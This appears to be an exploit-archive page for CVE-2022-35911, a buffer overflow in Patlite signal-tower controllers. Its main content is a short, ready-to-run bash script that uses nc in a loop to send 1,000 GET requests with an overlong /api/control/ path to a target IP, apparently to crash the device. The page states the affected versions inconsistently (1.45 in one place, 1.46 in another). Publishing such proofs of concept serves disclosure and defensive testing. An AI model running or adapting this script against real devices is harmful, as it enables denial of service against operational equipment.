Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Patlite 1.46 Buffer Overflow[6]
- Authored by Samy Younsi[7]
-
Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.
- advisories | CVE-2022-35911[8]
- SHA-256 |
5c29e3afa128083754b4bac9a8b929fac03751344f5c65c15f43df42fefcb136
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and bellow are affected
# Tested on: CentOs & Ubuntu
# CVE : CVE-2022-35911
#!/bin/bash
IP="192.168.1.101"
PORT="80"
for i in {0..1000};
do
echo "[$i]: ";
echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT;
done > /dev/null 2>&1
File Tags
- ActiveX[18] (932)
- Advisory[19] (77,782)
- Arbitrary[20] (15,167)
- BBS[21] (2,859)
- Bypass[22] (1,572)
- CGI[23] (1,013)
- Code Execution[24] (6,702)
- Conference[25] (671)
- Cracker[26] (797)
- CSRF[27] (3,272)
- DoS[28] (21,888)
- Encryption[29] (2,335)
- Exploit[30] (49,923)
- File Inclusion[31] (4,148)
- File Upload[32] (945)
- Firewall[33] (821)
- Info Disclosure[34] (2,551)
- Intrusion Detection[35] (857)
- Java[36] (2,794)
- JavaScript[37] (800)
- Kernel[38] (6,066)
- Local[39] (14,027)
- Magazine[40] (586)
- Overflow[41] (12,222)
- Perl[42] (1,412)
- PHP[43] (5,049)
- Proof of Concept[44] (2,283)
- Protocol[45] (3,321)
- Python[46] (1,404)
- Remote[47] (29,745)
- Root[48] (3,452)
- Ruby[49] (577)
- Scanner[50] (1,630)
- Security Tool[51] (7,708)
- Shell[52] (3,065)
- Shellcode[53] (1,203)
- Sniffer[54] (881)
- Spoof[55] (2,089)
- SQL Injection[56] (16,025)
- TCP[57] (2,362)
- Trojan[58] (676)
- UDP[59] (866)
- Virus[60] (659)
- Vulnerability[61] (30,504)
- Web[62] (9,048)
- Whitepaper[63] (3,719)
- x86[64] (943)
- XSS[65] (17,348)
- Other[66]
File Archives
- July 2022[67]
- June 2022[68]
- May 2022[69]
- April 2022[70]
- March 2022[71]
- February 2022[72]
- January 2022[73]
- December 2021[74]
- November 2021[75]
- October 2021[76]
- September 2021[77]
- August 2021[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,890)
- BSD[82] (368)
- CentOS[83] (55)
- Cisco[84] (1,913)
- Debian[85] (5,948)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,152)
- HPUX[89] (878)
- iOS[90] (319)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (42,437)
- Mac OS X[95] (683)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (478)
- RedHat[99] (11,715)
- Slackware[100] (941)
- Solaris[101] (1,607)
- SUSE[102] (1,444)
- Ubuntu[103] (7,898)
- UNIX[104] (9,091)
- UnixWare[105] (185)
- Windows[106] (6,432)
- Other[107]
